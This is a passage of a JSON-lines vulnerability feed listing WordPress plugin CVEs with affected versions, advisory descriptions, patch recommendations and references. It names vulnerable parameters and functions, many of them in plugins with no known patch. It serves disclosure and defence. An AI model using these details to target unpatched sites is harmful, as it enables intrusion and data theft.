ies-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5153","slug":"startklar-elmentor-forms-extwidgets","versionImpact":"1.7.15","description":"The Startklar Elementor Addons plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.7.15 via the 'dropzone_hash' parameter. This makes it possible for unauthenticated attackers to copy the contents of arbitrary files on the server, which can contain sensitive information, and to delete arbitrary directories, including the root WordPress directory.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/baa20290-9c01-4f8d-adeb-fbfb15b9d6a9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/baa20290-9c01-4f8d-adeb-fbfb15b9d6a9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/startklar-elmentor-forms-extwidgets\\\/trunk\\\/widgets\\\/dropzone_form_field.php#L334\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/startklar-elmentor-forms-extwidgets\\\/trunk\\\/widgets\\\/dropzone_form_field.php#L334\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8786","slug":"auto-featured-image-from-title","versionImpact":"2.3","description":"The Auto Featured Image from Title plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2bf6102-458f-4930-8880-baa96afb1c15?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2bf6102-458f-4930-8880-baa96afb1c15?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auto-featured-image-from-title\\\/trunk\\\/auto-featured-image-from-title.php#L822\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auto-featured-image-from-title\\\/trunk\\\/auto-featured-image-from-title.php#L822\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-51702","slug":"truenorth-srcset","versionImpact":"1.4","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Benjamin Moody, Eric Holmes SrcSet Responsive Images for WordPress allows Reflected XSS.This issue affects SrcSet Responsive Images for WordPress: from n\/a through 1.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/truenorth-srcset\\\/wordpress-srcset-responsive-images-for-wordpress-plugin-1-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/truenorth-srcset\\\/wordpress-srcset-responsive-images-for-wordpress-plugin-1-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11443","slug":"debranding","versionImpact":"1.0.2","description":"The de:branding plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the debranding_save() function in all versions up to, and including, 1.0.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/debranding\\\/trunk\\\/classes\\\/class-debrand-ajax.php#L19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/debranding\\\/trunk\\\/classes\\\/class-debrand-ajax.php#L19\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/debranding\\\/trunk\\\/classes\\\/class-debrand-ajax.php#L6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/debranding\\\/trunk\\\/classes\\\/class-debrand-ajax.php#L6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a827cea5-e8c2-47dd-81d7-e3700c19c8da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a827cea5-e8c2-47dd-81d7-e3700c19c8da?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13183","slug":"themeisle-companion","versionImpact":"2.10.43","description":"The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018title_tag\u2019 parameter in all versions up to, and including, 2.10.43 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/Codeinwp\\\/themeisle-companion\\\/commit\\\/47a17c86934cebbfc3f1a812f1afcaa20515c1f7\",\"name\":\"https:\\\/\\\/github.com\\\/Codeinwp\\\/themeisle-companion\\\/commit\\\/47a17c86934cebbfc3f1a812f1afcaa20515c1f7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/trunk\\\/obfx_modules\\\/elementor-extra-widgets\\\/widgets\\\/elementor\\\/pricing-table.php#L118\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/trunk\\\/obfx_modules\\\/elementor-extra-widgets\\\/widgets\\\/elementor\\\/pricing-table.php#L118\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3219568\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3219568\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/themeisle-companion\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/themeisle-companion\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0f6be2b-5eb6-4828-ae95-7f2253700ee9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0f6be2b-5eb6-4828-ae95-7f2253700ee9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1571","slug":"exclusive-addons-for-elementor","versionImpact":"2.7.6","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Animated Text and Image Comparison Widgets in all versions up to, and including, 2.7.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3245128\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3245128\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/exclusive-addons-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/exclusive-addons-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd2ec0b3-2784-4506-99f4-05187527fe6d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd2ec0b3-2784-4506-99f4-05187527fe6d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2719","slug":"swatchly","versionImpact":"1.4.0","description":"The Swatchly \u2013 WooCommerce Variation Swatches for Products (product attributes: Image swatch, Color swatches, Label swatches) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_dismiss function in versions 1.2.8 to 1.4.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update option values to 1\/true on the WordPress site. This can be leveraged to update an option that would create an error on the site and deny access to legitimate users or be used to set some values to true, such as registration.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/swatchly\\\/tags\\\/1.2.8\\\/includes\\\/Admin\\\/Notices.php#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/swatchly\\\/tags\\\/1.2.8\\\/includes\\\/Admin\\\/Notices.php#L59\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39336115-5993-49e1-b810-80a712e8e42b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39336115-5993-49e1-b810-80a712e8e42b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3876","slug":"sms-alert","versionImpact":"3.8.1","description":"The SMS Alert Order Notifications \u2013 WooCommerce plugin for WordPress is vulnerable to Privilege Escalation due to insufficient user OTP validation in the handleWpLoginCreateUserAction() function in all versions up to, and including, 3.8.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to impersonate any account by supplying its username or email and elevate their privileges to that of an administrator.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sms-alert\\\/tags\\\/3.8.0\\\/handler\\\/forms\\\/class-wplogin.php#L145\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sms-alert\\\/tags\\\/3.8.0\\\/handler\\\/forms\\\/class-wplogin.php#L145\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sms-alert\\\/tags\\\/3.8.0\\\/handler\\\/forms\\\/class-wplogin.php#L447\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sms-alert\\\/tags\\\/3.8.0\\\/handler\\\/forms\\\/class-wplogin.php#L447\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3290478\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3290478\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sms-alert\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sms-alert\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1cf65f79-d386-4dd4-a360-b2f764dfaf19?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1cf65f79-d386-4dd4-a360-b2f764dfaf19?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5932","slug":"homerunner-smartcheckout","versionImpact":"1.0.29","description":"The Homerunner plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.29. This is due to missing or incorrect nonce validation on the main_settings() function. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/homerunner-smartcheckout\\\/tags\\\/1.0.29\\\/classes\\\/class-settings.php#L319\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/homerunner-smartcheckout\\\/tags\\\/1.0.29\\\/classes\\\/class-settings.php#L319\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36eaff34-50cd-4399-8314-19ae4f50d017?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36eaff34-50cd-4399-8314-19ae4f50d017?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6585","slug":"wp-jobhunt","versionImpact":"7.2","description":"The WP JobHunt plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 7.2 via the cs_remove_profile_callback() function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete accounts of other users including admins.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/afb3e0e0-68c7-43f6-981f-59c3f3507429?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/afb3e0e0-68c7-43f6-981f-59c3f3507429?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0149","slug":"wordprezi","versionImpact":"0.8.2","description":"The WordPrezi WordPress plugin through 0.8.2 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6b6f9e42-7f7f-4daa-99c9-14a24a6d76b0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6b6f9e42-7f7f-4daa-99c9-14a24a6d76b0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0761","slug":"clock-in-portal","versionImpact":"2.1","description":"The Clock In Portal- Staff & Attendance Management WordPress plugin through 2.1 does not have CSRF check when deleting Staff members, which could allow attackers to make logged in admins delete arbitrary Staff via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/88fb064e-0001-446c-8e43-9fe3feff6c1f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/88fb064e-0001-446c-8e43-9fe3feff6c1f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2237","slug":"wp-replicate-post","versionImpact":"4.0.2","description":"The WP Replicate Post plugin for WordPress is vulnerable to SQL Injection via the post_id parameter in versions up to, and including, 4.0.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for contributor-level attackers or higher to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2910474%40wp-replicate-post%2Ftrunk&old=2896518%40wp-replicate-post%2Ftrunk&sfp_email=&sfph_mail=#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2910474%40wp-replicate-post%2Ftrunk&old=2896518%40wp-replicate-post%2Ftrunk&sfp_email=&sfph_mail=#file3\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/916e6f8b-cb29-4062-9a05-0337cfdb382a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/916e6f8b-cb29-4062-9a05-0337cfdb382a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-replicate-post\\\/trunk\\\/init\\\/functions.php#L81\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-replicate-post\\\/trunk\\\/init\\\/functions.php#L81\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3525","slug":"integrar-getnet-con-woo","versionImpact":"0.0.4","description":"The Getnet Argentina para Woocommerce plugin for WordPress is vulnerable to authorization bypass due to missing validation on the 'webhook' function in versions up to, and including, 0.0.4. This makes it possible for unauthenticated attackers to set their payment status to 'APPROVED' without payment.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/245e9117-ca63-458e-a094-60a759f5ec19?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/245e9117-ca63-458e-a094-60a759f5ec19?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.youtube.com\\\/watch?v=xTyWqh93AM0\",\"name\":\"https:\\\/\\\/www.youtube.com\\\/watch?v=xTyWqh93AM0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5606","slug":"chatbot","versionImpact":"4.9.6","description":"The ChatBot for WordPress is vulnerable to Stored Cross-Site Scripting via the FAQ Builder in versions 4.8.6 through 4.9.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. NOTE: This vulnerability is a re-introduction of CVE-2023-4253.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc305c48-8337-42b7-ad61-61aea8018def?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc305c48-8337-42b7-ad61-61aea8018def?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2987335%40chatbot%2Ftrunk&old=2986133%40chatbot%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2987335%40chatbot%2Ftrunk&old=2986133%40chatbot%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-24567","slug":"simple-post","versionImpact":"1.1","description":"The Simple Post WordPress plugin through 1.1 does not sanitize user input when an authenticated user Text value, then it does not escape these values when outputting to the browser leading to an Authenticated Stored XSS Cross-Site Scripting issue.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a3cd3115-2181-4e14-8b39-4de096433847\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a3cd3115-2181-4e14-8b39-4de096433847\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1860","slug":"antihacker","versionImpact":"4.51","description":"The Disable Json API, Login Lockdown, XMLRPC, Pingback, Stop User Enumeration Anti Hacker Scan plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the antihacker_add_whitelist() function in all versions up to, and including, 4.51. This makes it possible for unauthenticated attackers to add their IP Address to the whitelist circumventing protection","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d365284-73ac-4730-a83d-9202677cf161?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d365284-73ac-4730-a83d-9202677cf161?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3040434%40antihacker&new=3040434%40antihacker&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3040434%40antihacker&new=3040434%40antihacker&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1393","slug":"addon-elements-for-elementor-page-builder","versionImpact":"1.12.12","description":"The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'icon_align' attribute of the Content Switcher widget in all versions up to, and including, 1.12.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb0888d6-30e6-4957-b270-1968eace462e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb0888d6-30e6-4957-b270-1968eace462e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.12.12\\\/modules\\\/content-switcher\\\/skins\\\/skin-3.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.12.12\\\/modules\\\/content-switcher\\\/skins\\\/skin-3.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.13\\\/modules\\\/content-switcher\\\/skins\\\/skin-3.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.13\\\/modules\\\/content-switcher\\\/skins\\\/skin-3.php#L39\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3206","slug":"different-menus-in-different-pages","versionImpact":"2.3.2","description":"The Different Menu in Different Pages \u2013 Control Menu Visibility (All in One) plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the ajax() function in all versions up to, and including, 2.3.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to duplicate menus.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f9d4d86-9d5f-4888-9cc4-d55c117ae4ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f9d4d86-9d5f-4888-9cc4-d55c117ae4ea?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/different-menus-in-different-pages\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/duplicate-menus.php#L18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/different-menus-in-different-pages\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/duplicate-menus.php#L18\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5152","slug":"element-ready-lite","versionImpact":"6.1.0","description":"The ElementsReady Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018_id\u2019 parameter in all versions up to, and including, 6.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2cffdc3-bd74-42ab-befd-8a396c5d990d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2cffdc3-bd74-42ab-befd-8a396c5d990d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/element-ready-lite\\\/trunk\\\/inc\\\/Widgets\\\/info_box\\\/Element_Ready_Info_Box_Widget.php#L742\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/element-ready-lite\\\/trunk\\\/inc\\\/Widgets\\\/info_box\\\/Element_Ready_Info_Box_Widget.php#L742\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8428","slug":"forumwp","versionImpact":"2.0.2","description":"The ForumWP \u2013 Forum & Discussion Board Plugin plugin for WordPress is vulnerable to Privilege Escalation via Insecure Direct Object Reference in all versions up to, and including, 2.0.2 via the submit_form_handler due to missing validation on the 'user_id' user controlled key. This makes it possible for authenticated attackers, with subscriber-level access and above, to change the email address of administrative user accounts which can then be leveraged to reset the administrative users password and gain access to their account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5818587-0a52-4734-8f75-263b4ab5020e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5818587-0a52-4734-8f75-263b4ab5020e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forumwp\\\/trunk\\\/includes\\\/frontend\\\/class-actions-listener.php#L179\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forumwp\\\/trunk\\\/includes\\\/frontend\\\/class-actions-listener.php#L179\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8430","slug":"spice-starter-sites","versionImpact":"1.2.5","description":"The Spice Starter Sites plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the spice_starter_sites_importer_creater function in all versions up to, and including, 1.2.5. This makes it possible for unauthenticated attackers to import demo content.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec52337f-bdd1-4632-853b-da86d64751e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec52337f-bdd1-4632-853b-da86d64751e7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spice-starter-sites\\\/tags\\\/1.2.5\\\/spice-starter-sites.php#L1123\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spice-starter-sites\\\/tags\\\/1.2.5\\\/spice-starter-sites.php#L1123\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10837","slug":"customize-my-account-for-woocommerce","versionImpact":"2.7.29","description":"The SysBasics Customize My Account for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018tab\u2019 parameter in all versions up to, and including, 2.7.29 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a 